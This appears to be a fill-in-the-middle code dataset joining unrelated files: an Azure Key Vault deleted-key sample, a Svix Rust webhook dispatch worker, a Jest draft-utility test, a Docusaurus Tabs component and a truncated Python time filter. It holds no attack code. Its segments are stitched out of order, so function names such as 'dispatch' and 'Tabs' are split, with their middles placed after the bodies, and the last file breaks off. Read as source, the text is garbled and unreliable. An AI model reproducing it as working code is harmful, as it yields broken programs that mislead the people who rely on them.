created_key = key_client.create_key("key-name", "RSA")
key_client.begin_delete_key(created_key.name).wait()
# [START get_deleted_key]
# get a deleted key (requires soft-delete enabled for the vault)
deleted_key = key_client.get_deleted_key("key-name")
print(deleted_key.name)
# if the vault has soft-delete enabled, the key's deleted_date
# scheduled purge date and recovery id are set
print(deleted_key.deleted_date)
print(deleted_key.scheduled_purge_date)
print(deleted_key.recovery_id)
# [END get_deleted_key]
# [START recover_deleted_key]
# recover a deleted key to its latest version (requires soft-delete enabled for the vault)
recover_key_poller = key_client.begin_recover_deleted_key("key-name")
recovered_key = recover_key_poller.result()
print(recovered_key.id)
print(recovered_key.name)
# if you want to block until key is recovered server-side, call wait() on the poller
recover_key_poller.wait()
# [END recover_deleted_key] |
|
worker.rs | // SPDX-FileCopyrightText: © 2022 Svix Authors
// SPDX-License-Identifier: MIT
use crate::cfg::Configuration;
use crate::core::{
cache::Cache,
message_app::{CreateMessageApp, CreateMessageEndpoint},
types::{EndpointHeaders, EndpointSecret, MessageAttemptTriggerType, MessageId, MessageStatus},
};
use crate::db::models::{message, messageattempt, messagedestination};
use crate::error::{Error, Result};
use crate::queue::{MessageTask, QueueTask, TaskQueueConsumer, TaskQueueProducer};
use chrono::Utc;
use futures::future;
use reqwest::header::{HeaderMap, HeaderName};
use sea_orm::{entity::prelude::*, ActiveValue::Set, DatabaseConnection, EntityTrait};
use tokio::time::{sleep, Duration};
use std::{iter, str::FromStr};
const USER_AGENT: &str = concat!("Svix-Webhooks/", env!("CARGO_PKG_VERSION"));
/// Generates a set of headers for any one webhook event
fn generate_msg_headers(
timestamp: i64,
whitelabel_headers: bool,
body: &str,
msg_id: &MessageId,
configured_headers: Option<&EndpointHeaders>,
endpoint_signing_keys: &[&EndpointSecret],
_endpoint_url: &str,
) -> HeaderMap {
let to_sign = format!("{}.{}.{}", msg_id, timestamp, body);
let signatures = endpoint_signing_keys
.iter()
.map(|x| hmac_sha256::HMAC::mac(to_sign.as_bytes(), &x.0[..]));
let signatures_str = signatures
.map(|x| format!("v1,{}", base64::encode(x)))
.collect::<Vec<String>>()
.join(" ");
let mut headers = HeaderMap::new();
let id = msg_id.0.parse().expect("Error parsing message id");
let timestamp = timestamp
.to_string()
.parse()
.expect("Error parsing message timestamp");
let signatures_str = signatures_str
.parse()
.expect("Error parsing message signatures");
if whitelabel_headers {
headers.insert("webhook-id", id);
headers.insert("webhook-timestamp", timestamp);
headers.insert("webhook-signature", signatures_str);
} else {
headers.insert("svix-id", id);
headers.insert("svix-timestamp", timestamp);
headers.insert("svix-signature", signatures_str);
}
if let Some(configured_headers) = configured_headers {
for (k, v) in &configured_headers.0 {
if let (Ok(k), Ok(v)) = (HeaderName::from_str(k), v.parse()) {
headers.insert(k, v);
} else {
tracing::error!("Invalid HeaderName or HeaderValues for `{}: {}`", k, v);
}
}
}
headers
}
/// Dispatches one webhook
async fn d |
cfg: Configuration,
db: &DatabaseConnection,
queue_tx: &TaskQueueProducer,
payload: &Json,
msg_task: MessageTask,
endp: CreateMessageEndpoint,
) -> Result<()> {
tracing::trace!("Dispatch: {} {}", &msg_task.msg_id, &endp.id);
let body = serde_json::to_string(&payload).expect("Error parsing message body");
let headers = {
let keys: Vec<&EndpointSecret> = if let Some(ref old_keys) = endp.old_signing_keys {
iter::once(&endp.key)
.chain(old_keys.0.iter().map(|x| &x.key))
.collect()
} else {
vec![&endp.key]
};
let mut headers = generate_msg_headers(
Utc::now().timestamp(),
cfg.whitelabel_headers,
&body,
&msg_task.msg_id,
endp.headers.as_ref(),
&keys,
&endp.url,
);
headers.insert("user-agent", USER_AGENT.to_string().parse().unwrap());
headers
};
let client = reqwest::Client::builder()
.redirect(reqwest::redirect::Policy::none())
.build()
.expect("Invalid reqwest Client configuration");
let res = client
.post(&endp.url)
.headers(headers)
.timeout(Duration::from_secs(cfg.worker_request_timeout as u64))
.json(&payload)
.send()
.await;
let msg_dest = messagedestination::Entity::secure_find_by_msg(msg_task.msg_id.clone())
.filter(messagedestination::Column::EndpId.eq(endp.id.clone()))
.one(db)
.await?
.ok_or_else(|| {
Error::Generic(format!(
"Msg dest not found {} {}",
msg_task.msg_id, endp.id
))
})?;
if (msg_dest.status != MessageStatus::Pending && msg_dest.status != MessageStatus::Sending)
&& (msg_task.trigger_type != MessageAttemptTriggerType::Manual)
{
// TODO: it happens when this message destination is "resent". This leads to 2 queue tasks with the same message destination
tracing::warn!(
"MessageDestination {} is not pending (it's {:?}).",
msg_dest.id,
msg_dest.status
);
return Ok(());
}
let attempt = messageattempt::ActiveModel {
msg_id: Set(msg_task.msg_id.clone()),
endp_id: Set(endp.id.clone()),
msg_dest_id: Set(msg_dest.id.clone()),
url: Set(endp.url.clone()),
ended_at: Set(Some(Utc::now().into())),
trigger_type: Set(msg_task.trigger_type),
..Default::default()
};
let attempt = match res {
Ok(res) => {
let status_code = res.status().as_u16() as i16;
let status = if res.status().is_success() {
MessageStatus::Success
} else {
MessageStatus::Fail
};
let http_error = res.error_for_status_ref().err();
let bytes = res
.bytes()
.await
.expect("Could not read endpoint response body");
let body = bytes_to_string(bytes);
let attempt = messageattempt::ActiveModel {
response_status_code: Set(status_code),
response: Set(body),
status: Set(status),
..attempt
};
match http_error {
Some(err) => Err((attempt, err)),
None => Ok(attempt),
}
}
Err(err) => {
let attempt = messageattempt::ActiveModel {
response_status_code: Set(0),
response: Set("".to_owned()),
status: Set(MessageStatus::Fail),
..attempt
};
Err((attempt, err))
}
};
match attempt {
Ok(attempt) => {
let _attempt = attempt.insert(db).await?;
let msg_dest = messagedestination::ActiveModel {
status: Set(MessageStatus::Success),
next_attempt: Set(None),
..msg_dest.into()
};
let msg_dest = msg_dest.update(db).await?;
tracing::trace!("Worker success: {} {}", &msg_dest.id, &endp.id,);
}
Err((attempt, err)) => {
let _attempt = attempt.insert(db).await?;
let attempt_count = msg_task.attempt_count as usize;
if msg_task.trigger_type == MessageAttemptTriggerType::Manual {
tracing::debug!("Manual retry failed");
} else if attempt_count < cfg.retry_schedule.len() {
tracing::debug!(
"Worker failure retrying for attempt {}: {} {} {}",
attempt_count,
err,
&msg_dest.id,
&endp.id
);
let duration = cfg.retry_schedule[attempt_count];
let msg_dest = messagedestination::ActiveModel {
next_attempt: Set(Some(
(Utc::now()
+ chrono::Duration::from_std(duration)
.expect("Error parsing duration"))
.into(),
)),
..msg_dest.into()
};
let _msg_dest = msg_dest.update(db).await?;
queue_tx
.send(
QueueTask::MessageV1(MessageTask {
attempt_count: msg_task.attempt_count + 1,
..msg_task
}),
Some(duration),
)
.await?;
} else {
tracing::debug!(
"Worker failure attempts exhausted: {} {} {}",
err,
&msg_dest.id,
&endp.id
);
let msg_dest = messagedestination::ActiveModel {
status: Set(MessageStatus::Fail),
next_attempt: Set(None),
..msg_dest.into()
};
let _msg_dest = msg_dest.update(db).await?;
}
}
}
Ok(())
}
fn bytes_to_string(bytes: bytes::Bytes) -> String {
match std::str::from_utf8(&bytes.to_vec()) {
Ok(v) => v.to_owned(),
Err(_) => base64::encode(&bytes),
}
}
/// Manages preparation and execution of a QueueTask type
async fn process_task(
cfg: Configuration,
db: &DatabaseConnection,
cache: Cache,
queue_tx: &TaskQueueProducer,
queue_task: QueueTask,
) -> Result<()> {
let msg = message::Entity::find_by_id(queue_task.clone().msg_id())
.one(db)
.await?
.ok_or_else(|| {
Error::Generic(format!(
"Unexpected: message doesn't exist {}",
queue_task.clone().msg_id()
))
})?;
let payload = msg.payload.as_ref().expect("Message payload is NULL");
let create_message_app = CreateMessageApp::layered_fetch(
cache.clone(),
db,
None,
msg.app_id.clone(),
msg.org_id.clone(),
Duration::from_secs(30),
)
.await?
.ok_or_else(|| Error::Generic(format!("Application doesn't exist: {}", &msg.app_id)))?;
let endpoints: Vec<CreateMessageEndpoint> = create_message_app
.filtered_endpoints(queue_task.clone().trigger_type(), &msg)
.iter()
.filter(|endpoint| match &queue_task {
QueueTask::MessageV1(task) => task.endpoint_id == endpoint.id,
QueueTask::MessageBatch(_) => true,
})
.cloned()
.collect();
// TODO: remove this section once destinations are obsolete
if matches!(queue_task, QueueTask::MessageBatch(_)) {
let destinations = endpoints
.iter()
.map(|endpoint| messagedestination::ActiveModel {
msg_id: Set(msg.id.clone()),
endp_id: Set(endpoint.id.clone()),
next_attempt: Set(Some(Utc::now().into())),
status: Set(MessageStatus::Sending),
..Default::default()
});
messagedestination::Entity::insert_many(destinations)
.exec(db)
.await?;
}
let futures: Vec<_> = endpoints
.iter()
.map(|endpoint| {
dispatch(
cfg.clone(),
db,
queue_tx,
payload,
queue_task.clone().to_msg_task(endpoint.id.clone()),
endpoint.to_owned(),
)
})
.collect();
let join = future::join_all(futures).await;
let errs: Vec<_> = join.iter().filter(|x| x.is_err()).collect();
if !errs.is_empty() {
return Err(Error::Generic(format!(
"Some dispatches failed unexpectedly: {:?}",
errs
)));
}
Ok(())
}
/// Listens on the message queue for new tasks
pub async fn worker_loop(
cfg: &Configuration,
pool: &DatabaseConnection,
cache: Cache,
queue_tx: TaskQueueProducer,
mut queue_rx: TaskQueueConsumer,
) -> Result<()> {
loop {
match queue_rx.receive_all().await {
Ok(batch) => {
for delivery in batch {
let cfg = cfg.clone();
let pool = pool.clone();
let cache = cache.clone();
let queue_tx = queue_tx.clone();
let queue_task = delivery.task.clone();
tokio::spawn(async move {
if let Err(err) =
process_task(cfg.clone(), &pool, cache.clone(), &queue_tx, queue_task)
.await
{
tracing::error!("Error executing task: {}", err);
queue_tx
.nack(delivery)
.await
.expect("Error sending 'nack' to Redis after task execution error");
} else {
queue_tx.ack(delivery).await.expect(
"Error sending 'ack' to Redis after successful task execution",
);
}
});
}
}
Err(err) => {
tracing::error!("Error receiving task: {}", err);
sleep(Duration::from_millis(10)).await;
}
}
}
}
#[cfg(test)]
mod tests {
use super::*;
use crate::core::types::BaseId;
use bytes::Bytes;
use std::collections::HashMap;
// [`generate_msg_headers`] tests
const TIMESTAMP: i64 = 1;
const WHITELABEL_HEADERS: bool = false;
const BODY: &str = "{\"test\": \"body\"}";
const ENDPOINT_SIGNING_KEYS: &[&EndpointSecret] = &[];
const ENDPOINT_URL: &str = "http://localhost:8071";
/// Utility function that returns the default set of headers before configurable headers are
/// accounted for
fn mock_headers() -> (HeaderMap, MessageId) {
let id = MessageId::new(None, None);
(
generate_msg_headers(
TIMESTAMP,
WHITELABEL_HEADERS,
BODY,
&id,
None,
ENDPOINT_SIGNING_KEYS,
ENDPOINT_URL,
),
id,
)
}
// Tests configurable headers with a valid and an invalid header. The valid header pair should
// be included, while the invalid pair should be skipped.
#[test]
fn test_generate_msg_headers_with_custom_headers() {
// The headers to be given to [`generate_msg_headers`]
let mut headers = HashMap::new();
headers.insert("test_key".to_owned(), "value".to_owned());
headers.insert("invälid_key".to_owned(), "value".to_owned());
// The invalid key should be skipped over so it is not included in the expected
let (mut expected, id) = mock_headers();
let _ = expected.insert("test_key", "value".parse().unwrap());
let actual = generate_msg_headers(
TIMESTAMP,
WHITELABEL_HEADERS,
BODY,
&id,
Some(&EndpointHeaders(headers)),
ENDPOINT_SIGNING_KEYS,
ENDPOINT_URL,
);
assert_eq!(expected, actual);
}
// Tests endpoint signing keys -- expected values are fetched from the Svix documentation for a
// direct comparison to the current implementation.
#[test]
fn test_generate_msg_headers_with_signing_key() {
let test_timestamp = 1614265330;
let test_body = "{\"test\": 2432232314}";
let test_key = EndpointSecret(base64::decode("MfKQ9r8GKYqrTwjUPD8ILPZIo2LaLaSw").unwrap());
let test_message_id = MessageId("msg_p5jXN8AQM9LWM0D4loKWxJek".to_owned());
let expected_signature_str = "v1,g0hM9SsE+OTPJTGt/tmIKtSyZlE3uFJELVlNIOLJ1OE=";
let actual = generate_msg_headers(
test_timestamp,
WHITELABEL_HEADERS,
test_body,
&test_message_id,
None,
&[&test_key],
ENDPOINT_URL,
);
assert_eq!(
actual.get("svix-signature").unwrap(),
expected_signature_str
);
}
#[test]
fn test_bytes_to_string() {
let b = Bytes::from_static(b"Hello, world.");
assert_eq!(bytes_to_string(b), "Hello, world.");
}
}
| ispatch( |
draftutil.test.js | const sinon = require('sinon');
const fixturesPath = 'fixtures';
const cubefixture = require('../../../fixtures/examplecube');
let CardRating = require('../../../models/cardrating');
let Draft = require('../../../models/draft');
const carddb = require('../../../serverjs/cards');
import Filter from '../../../src/utils/Filter';
import methods from '../../../src/utils/draftutil';
import { expectOperator } from '../../helpers';
describe('getDraftBots', () => {
it('can get the correct number of draft bots', () => {
const params = {
seats: 5,
};
const result = methods.getDraftBots(params);
expect(result.length).toBe(params.seats - 1);
});
it('can get bots with the correct properties', () => {
const allColors = ['W', 'U', 'B', 'R', 'G'];
const params = {
seats: 2,
};
const result = methods.getDraftBots(params);
expect(result[0].length).toBe(2);
expect(allColors.includes(result[0][0])).toBe(true);
expect(allColors.includes(result[0][1])).toBe(true);
expect(result[0][0] === result[0][1]).toBe(false);
});
});
describe('getDraftFormat', () => {
let exampleCube;
it('returns the default format if params are < 0', () => {
let params = {
id: -1,
seats: 4,
packs: 3,
cards: 2,
};
const format = methods.getDraftFormat(params, exampleCube);
let expected_format = [
['*', '*'], // pack 1 (* is any card)
['*', '*'], // pack 2
['*', '*'], // pack 3
];
expected_format.custom = false;
expected_format.multiples = false;
expect(format).toEqual(expected_format);
expect(format.custom).toBe(false);
expect(format.multiples).toBe(false);
});
describe('returns a custom format if params are > 0', () => {
let params;
beforeAll(() => {
params = { id: 0, seats: 8 }; // packs and cards determined by custom format
exampleCube = {};
exampleCube.draft_formats = [];
exampleCube.draft_formats[0] = {}; // mock
});
let expectedFilters = function(...args) {
let expectedFormat = [];
args.forEach((filterText) => {
if (filterText !== null) {
let tokens = [];
Filter.tokenizeInput(filterText, tokens);
filterText = Filter.parseTokens(tokens); | };
describe.each([
[
'example filters - 1 pack, 1 card',
'[["rarity:Mythic,tag:New,identity>1"]]', // filter JSON
false, // multiples
[[expectedFilters('rarity:Mythic', 'tag:New', 'identity>1')]],
],
[
'example filters - 1 pack, 2 cards, allow multiples',
'[["rarity:Mythic,tag:New,identity>1", "tag:mytag"]]', // filter JSON
true, // multiples
[[expectedFilters('rarity:Mythic', 'tag:New', 'identity>1'), expectedFilters('tag:mytag')]],
],
[
'backwards compatible tags',
'[["mytag,*,*"]]', // filter JSON
false, // multiples
[[expectedFilters('tag:mytag', null, null)]],
],
[
'mixed filters and tags with multiple packs with different card counts',
'[["rarity:Mythic,mytag"],["*"],["rarity:mythic,rarity:common","*"]]', // filter JSON
false, // multiples
[
[expectedFilters('rarity:Mythic', 'tag:mytag')], // pack 1
[[[null]]], // pack 2
[expectedFilters('rarity:Mythic', 'rarity:common'), [[null]]], // pack 3
],
],
])('%s', (name, packsFormat, multiples, expected) => {
test(`returns expected format`, () => {
exampleCube.draft_formats[params.id].packs = packsFormat;
exampleCube.draft_formats[params.id].multiples = multiples;
// NOTE: Because the format array also includes properties (which we aren't testing in this test)
// we need to convert to json to compare safely.
// See https://github.com/facebook/jest/issues/8475
let formatJSON = JSON.stringify(methods.getDraftFormat(params, exampleCube));
let expectedJSON = JSON.stringify(expected);
expect(formatJSON).toEqual(expectedJSON);
});
test(`returned has correct multiples value`, () => {
exampleCube.draft_formats[params.id].packs = packsFormat;
exampleCube.draft_formats[params.id].multiples = multiples;
expect(methods.getDraftFormat(params, exampleCube).multiples).toEqual(multiples);
});
test(`returned format is marked as custom`, () => {
exampleCube.draft_formats[params.id].packs = packsFormat;
exampleCube.draft_formats[params.id].multiples = multiples;
expect(methods.getDraftFormat(params, exampleCube).custom).toEqual(true);
});
});
});
});
describe('populateDraft', () => {
let draft, format, cards, bots, seats;
beforeAll(() => {
draft = new Draft();
format = [];
cards = [];
bots = [];
seats = 8;
});
it('returns an error if no cards supplied', () => {
cards = [];
bots = ['fakebot'];
expect(() => {
methods.populateDraft(draft, format, cards, bots, seats);
}).toThrow(/no cards/);
});
it('returns an error if no bots supplied', () => {
cards = ['mockcard'];
bots = [];
expect(() => {
methods.populateDraft(draft, format, cards, bots, seats);
}).toThrow(/no bots/);
});
it('returns an error if seats < 2', () => {
cards = ['mockcards'];
bots = ['mockbot'];
expect(() => {
methods.populateDraft(draft, format, cards, bots, 1);
}).toThrow(/invalid seats/);
expect(() => {
methods.populateDraft(draft, format, cards, bots, null);
}).toThrow(/invalid seats/);
expect(() => {
methods.populateDraft(draft, format, cards, bots, -1);
}).toThrow(/invalid seats/);
});
describe('', () => {
let exampleCube;
beforeAll(() => {
exampleCube = JSON.parse(JSON.stringify(cubefixture.exampleCube));
exampleCube.draft_formats = [];
exampleCube.draft_formats[0] = {}; // mock
return carddb.initializeCardDb(fixturesPath, true).then(() => {
exampleCube.cards.forEach(function(card, index) {
card.details = carddb.cardFromId(card.cardID);
});
});
});
it('sets the initial state of the draft', () => {
cards = exampleCube.cards.slice();
bots = ['mockbot'];
format = methods.getDraftFormat({ id: -1, packs: 1, cards: 15, seats: seats }, exampleCube);
methods.populateDraft(draft, format, cards, bots, 8);
expect(draft.pickNumber).toEqual(1);
expect(draft.packNumber).toEqual(1);
expect(draft).toHaveProperty('packs');
expect(draft).toHaveProperty('initial_state');
expect(draft).toHaveProperty('bots');
// CoreMongooseArray causing trouble, so we check length and use stringify
expect(draft.bots.length).toEqual(1);
let initial_stateJSON = JSON.stringify(draft.initial_state);
let packsJSON = JSON.stringify(draft.packs);
expect(initial_stateJSON).toEqual(packsJSON);
});
it('fails if it runs out of cards in a standard draft', () => {
cards = exampleCube.cards.slice();
bots = ['mockbot'];
seats = 8;
// cube only contains 65 cards, so 8 * 1 * 15 = 120, should run out if multiples = false
format = methods.getDraftFormat({ id: -1, packs: 1, cards: 15, seats: seats }, exampleCube);
expect(() => {
methods.populateDraft(draft, format, cards, bots, seats);
}).toThrow(/not enough cards/);
});
it('fails if it runs out of cards in a custom draft', () => {
cards = exampleCube.cards.slice();
bots = ['mockbot'];
seats = 8;
// cube only contains 65 cards, so 8 * 2 * 5 = 80, should run out if multiples = false
exampleCube.draft_formats[0].packs = '[["*","*","*","*","*"],["*","*","*","*","*"]]';
format = methods.getDraftFormat({ id: 0 }, exampleCube);
expect(() => {
methods.populateDraft(draft, format, cards, bots, seats);
}).toThrow(/not enough cards/);
});
it.only('fails if it runs out of filtered cards in a custom draft', () => {
cards = exampleCube.cards.slice();
bots = ['mockbot'];
seats = 6;
// cube only contains 65 cards, so 6 * 5 = 30 > 13 blue cards, should run out if multiples = false
exampleCube.draft_formats[0].packs = '[["c>=u","c>=u","c:u","c:u","c:u"],["*"]]';
format = methods.getDraftFormat({ id: 0 }, exampleCube);
format.multiples = true;
expect(() => {
methods.populateDraft(draft, format, cards, bots, seats);
}).not.toThrow(/not enough cards/);
// note: because multiples true, cards not "used up" for next check
format.multiples = false;
expect(() => {
methods.populateDraft(draft, format, cards, bots, seats);
}).toThrow(/not enough cards/);
});
});
}); | }
expectedFormat.push([filterText]);
});
return expectedFormat; |
index.tsx | /**
* Copyright (c) Facebook, Inc. and its affiliates.
*
* This source code is licensed under the MIT license found in the
* LICENSE file in the root directory of this source tree.
*/
import React, {useState, Children, ReactElement} from 'react';
import useUserPreferencesContext from '@theme/hooks/useUserPreferencesContext';
import clsx from 'clsx';
import styles from './styles.module.css';
const keys = {
left: 37,
right: 39,
};
type Props = {
block?: boolean;
children: ReactElement<{value: string}>[];
defaultValue?: string;
values: {value: string; label: string}[];
groupId?: string;
};
function | (props: Props): JSX.Element {
const {block, children, defaultValue, values, groupId} = props;
const {tabGroupChoices, setTabGroupChoices} = useUserPreferencesContext();
const [selectedValue, setSelectedValue] = useState(defaultValue);
if (groupId != null) {
const relevantTabGroupChoice = tabGroupChoices[groupId];
if (
relevantTabGroupChoice != null &&
relevantTabGroupChoice !== selectedValue &&
values.some((value) => value.value === relevantTabGroupChoice)
) {
setSelectedValue(relevantTabGroupChoice);
}
}
const changeSelectedValue = (newValue) => {
setSelectedValue(newValue);
if (groupId != null) {
setTabGroupChoices(groupId, newValue);
}
};
const tabRefs: (HTMLLIElement | null)[] = [];
const focusNextTab = (tabs, target) => {
const next = tabs.indexOf(target) + 1;
if (!tabs[next]) {
tabs[0].focus();
} else {
tabs[next].focus();
}
};
const focusPreviousTab = (tabs, target) => {
const prev = tabs.indexOf(target) - 1;
if (!tabs[prev]) {
tabs[tabs.length - 1].focus();
} else {
tabs[prev].focus();
}
};
const handleKeydown = (tabs, target, event) => {
switch (event.keyCode) {
case keys.right:
focusNextTab(tabs, target);
break;
case keys.left:
focusPreviousTab(tabs, target);
break;
default:
break;
}
};
return (
<div>
<ul
role="tablist"
aria-orientation="horizontal"
className={clsx('tabs', {
'tabs--block': block,
})}>
{values.map(({value, label}) => (
<li
role="tab"
tabIndex={0}
aria-selected={selectedValue === value}
className={clsx('tabs__item', styles.tabItem, {
'tabs__item--active': selectedValue === value,
})}
key={value}
ref={(tabControl) => tabRefs.push(tabControl)}
onKeyDown={(event) => handleKeydown(tabRefs, event.target, event)}
onFocus={() => changeSelectedValue(value)}
onClick={() => changeSelectedValue(value)}>
{label}
</li>
))}
</ul>
<div role="tabpanel" className="margin-vert--md">
{
Children.toArray(children).filter(
(child) =>
(child as ReactElement<{value: string}>).props.value ===
selectedValue,
)[0]
}
</div>
</div>
);
}
export default Tabs;
| Tabs |
time.py | from typing import Callable
from datetime import datetime, timezone
from time import mktime
from ..common.const import (
MILESTONES_USING_TIMESTAMP_ONLY,
TIMESTAMP_B,
TIMESTAMP_E,
ATCH_TIMESTAMP_B,
ATCH_TIMESTAMP_E
)
from ..common import tryte_to_int
import logging
__all__ = [
'TimeFilter',
]
class TimeFilter():
"""
Time filter for transaction
Attributes
----------
min : int
The private earliest Unix epoch time for filtering
max : int
The private latest Unix epoch time for filtering
Methods
-------
make_filter()
Return the built time filter
"""
def __init__(self, start_date: str, end_date: str) -> None:
"""
Parameters
----------
start_date : str
The start_date (%Y%m%d) of transaction to monitor (e.g., "20200101")
end_date : str
The end_date (%Y%m%d) of transaction to monitor (e.g., "20200201")
"""
try:
self._min = mktime(datetime.strptime(
start_date, "%Y%m%d").timetuple())
self._max = mktime(datetime.strptime(
end_date, "%Y%m%d").timetuple())
except:
logging.error("Dates {} and {} are not supported!".format(
start_date, end_date))
logging.error("Plese use \"%Y%m%d\" instead, e.g., \"20200101\"")
def _get_transaction_dmp(self, timestamp: int, attachmenttimestame: int, milestone: str) -> int:
|
def _get_transaction_time(self, timestamp: int, attachmenttimestame: int) -> int:
if attachmenttimestame != 0:
return attachmenttimestame/1000
else:
return timestamp
def _time_range_filter(self, transaction: dict) -> bool:
try:
t = self._get_transaction_time(
transaction['timestamp'], transaction['attachment_timestamp'])
return t < self._max and t > self._min
except:
logging.error(
"Objects for time filtering (min<time<max) do not have time item!")
def _time_filter_larger_than_min(self, transaction: dict) -> bool:
try:
t = self._get_transaction_time(
transaction['timestamp'], transaction['attachment_timestamp'])
return t > self._min
except:
logging.error(
"Objects for time filtering (time>min) do not have time item!")
def _time_filter_smaller_than_max(self, transaction: dict) -> bool:
try:
t = self._get_transaction_time(
transaction['timestamp'], transaction['attachment_timestamp'])
return t < self._max
except:
logging.error(
"Objects for smaller time filtering (time<max) do not have time item!")
def _time_euqal_filter(self, transaction: dict) -> bool:
try:
t = self._get_transaction_time(
transaction['timestamp'], transaction['attachment_timestamp'])
return t == self._min
except:
logging.error(
"Objects for time filtering (time=min) do not have time item!")
def _time_range_with_euqal_filter(self, transaction: dict) -> bool:
try:
t = self._get_transaction_time(
transaction['timestamp'], transaction['attachment_timestamp'])
return t <= self._max and t >= self._min
except:
logging.error(
"Objects for time filtering (min<=time<=max) do not have time item!")
def _time_filter_equal_to_or_larger_than_min(self, transaction: dict) -> bool:
try:
t = self._get_transaction_time(
transaction['timestamp'], transaction['attachment_timestamp'])
return t >= self._min
except:
logging.error(
"Objects for time filtering (time>=min) do not have time item!")
def _time_filter_equal_to_or_smaller_than_max(self, transaction: dict) -> bool:
try:
t = self._get_transaction_time(
transaction['timestamp'], transaction['attachment_timestamp'])
return t <= self._max
except:
logging.error(
"Objects for smaller time filtering (time<=max) do not have time item!")
def _dmptime_range_filter_str(self, transaction_milestone: tuple) -> bool:
try:
timestamp = tryte_to_int(
transaction_milestone[0], TIMESTAMP_B, TIMESTAMP_E)
attachment_timestamp = tryte_to_int(
transaction_milestone[0], ATCH_TIMESTAMP_B, ATCH_TIMESTAMP_E)
milestone = transaction_milestone[1]
t = self._get_transaction_dmp(
timestamp, attachment_timestamp, milestone)
return t < self._max and t > self._min
except:
logging.error(
"Objects for time filtering (min<time<max) do not have time item!")
def _dmptime_filter_larger_than_min_str(self, transaction_milestone: tuple) -> bool:
try:
timestamp = tryte_to_int(
transaction_milestone[0], TIMESTAMP_B, TIMESTAMP_E)
attachment_timestamp = tryte_to_int(
transaction_milestone[0], ATCH_TIMESTAMP_B, ATCH_TIMESTAMP_E)
milestone = transaction_milestone[1]
t = self._get_transaction_dmp(
timestamp, attachment_timestamp, milestone)
return t > self._min
except:
logging.error(
"Objects for time filtering (time>min) do not have time item!")
def _dmptime_filter_smaller_than_max_str(self, transaction_milestone: tuple) -> bool:
try:
timestamp = tryte_to_int(
transaction_milestone[0], TIMESTAMP_B, TIMESTAMP_E)
attachment_timestamp = tryte_to_int(
transaction_milestone[0], ATCH_TIMESTAMP_B, ATCH_TIMESTAMP_E)
milestone = transaction_milestone[1]
t = self._get_transaction_dmp(
timestamp, attachment_timestamp, milestone)
return t < self._max
except:
logging.error(
"Objects for smaller time filtering (time<max) do not have time item!")
def _dmptime_euqal_filter_str(self, transaction_milestone: tuple) -> bool:
try:
timestamp = tryte_to_int(
transaction_milestone[0], TIMESTAMP_B, TIMESTAMP_E)
attachment_timestamp = tryte_to_int(
transaction_milestone[0], ATCH_TIMESTAMP_B, ATCH_TIMESTAMP_E)
milestone = transaction_milestone[1]
t = self._get_transaction_dmp(
timestamp, attachment_timestamp, milestone)
return t == self._min
except:
logging.error(
"Objects for time filtering (time=min) do not have time item!")
def _dmptime_range_with_euqal_filter_str(self, transaction_milestone: tuple) -> bool:
try:
timestamp = tryte_to_int(
transaction_milestone[0], TIMESTAMP_B, TIMESTAMP_E)
attachment_timestamp = tryte_to_int(
transaction_milestone[0], ATCH_TIMESTAMP_B, ATCH_TIMESTAMP_E)
milestone = transaction_milestone[1]
t = self._get_transaction_dmp(
timestamp, attachment_timestamp, milestone)
return t <= self._max and t >= self._min
except:
logging.error(
"Objects for time filtering (min<=time<=max) do not have time item!")
def _dmptime_filter_equal_to_or_larger_than_min_str(self, transaction_milestone: tuple) -> bool:
try:
timestamp = tryte_to_int(
transaction_milestone[0], TIMESTAMP_B, TIMESTAMP_E)
attachment_timestamp = tryte_to_int(
transaction_milestone[0], ATCH_TIMESTAMP_B, ATCH_TIMESTAMP_E)
milestone = transaction_milestone[1]
t = self._get_transaction_dmp(
timestamp, attachment_timestamp, milestone)
return t >= self._min
except:
logging.error(
"Objects for time filtering (time>=min) do not have time item!")
def _dmptime_filter_equal_to_or_smaller_than_max_str(self, transaction_milestone: tuple) -> bool:
try:
timestamp = tryte_to_int(
transaction_milestone[0], TIMESTAMP_B, TIMESTAMP_E)
attachment_timestamp = tryte_to_int(
transaction_milestone[0], ATCH_TIMESTAMP_B, ATCH_TIMESTAMP_E)
milestone = transaction_milestone[1]
t = self._get_transaction_dmp(
timestamp, attachment_timestamp, milestone)
return t <= self._max
except:
logging.error(
"Objects for smaller time filtering (time<=max) do not have time item!")
def _time_range_filter_str(self, transaction: str) -> bool:
try:
t = tryte_to_int(transaction, TIMESTAMP_B, TIMESTAMP_E)
return t < self._max and t > self._min
except:
logging.error(f"Cannot identify timestamp: {transaction}!")
def _time_filter_larger_than_min_str(self, transaction: str) -> bool:
try:
t = tryte_to_int(transaction, TIMESTAMP_B, TIMESTAMP_E)
return t > self._min
except:
logging.error(f"Cannot identify timestamp: {transaction}!")
def _time_filter_smaller_than_max_str(self, transaction: str) -> bool:
try:
t = tryte_to_int(transaction, TIMESTAMP_B, TIMESTAMP_E)
return t < self._max
except:
logging.error(f"Cannot identify timestamp: {transaction}!")
def _time_euqal_filter_str(self, transaction: str) -> bool:
try:
t = tryte_to_int(transaction, TIMESTAMP_B, TIMESTAMP_E)
return t == self._min
except:
logging.error(f"Cannot identify timestamp: {transaction}!")
def _time_range_with_euqal_filter_str(self, transaction: str) -> bool:
try:
t = tryte_to_int(transaction, TIMESTAMP_B, TIMESTAMP_E)
return t <= self._max and t >= self._min
except:
logging.error(f"Cannot identify timestamp: {transaction}!")
def _time_filter_equal_to_or_larger_than_min_str(self, transaction: str) -> bool:
try:
t = tryte_to_int(transaction, TIMESTAMP_B, TIMESTAMP_E)
return t >= self._min
except:
logging.error(f"Cannot identify timestamp: {transaction}!")
def _time_filter_equal_to_or_smaller_than_max_str(self, transaction: str) -> bool:
try:
t = tryte_to_int(transaction, TIMESTAMP_B, TIMESTAMP_E)
return t <= self._max
except:
logging.error(f"Cannot identify timestamp: {transaction}!")
def make_filter(self, range_larger_smaller='R') -> Callable:
"""time filter generation function.
Parameters
----------
range_larger_smaller (str) :
'R' for min < time < max
'm' for time > min
'M' for time < max
'E' for time = min
'RE' for min <= time <= max
'mE' for time >= min
'ME' for time <= max
Returns
----------
The built time filter.
"""
if range_larger_smaller == 'R':
return self._time_range_filter_str
elif range_larger_smaller == 'm':
return self._time_filter_larger_than_min_str
elif range_larger_smaller == 'M':
return self._time_filter_smaller_than_max_str
elif range_larger_smaller == 'E':
return self._time_euqal_filter_str
elif range_larger_smaller == 'RE':
return self._time_range_with_euqal_filter_str
elif range_larger_smaller == 'mE':
return self._time_filter_equal_to_or_larger_than_min_str
elif range_larger_smaller == 'ME':
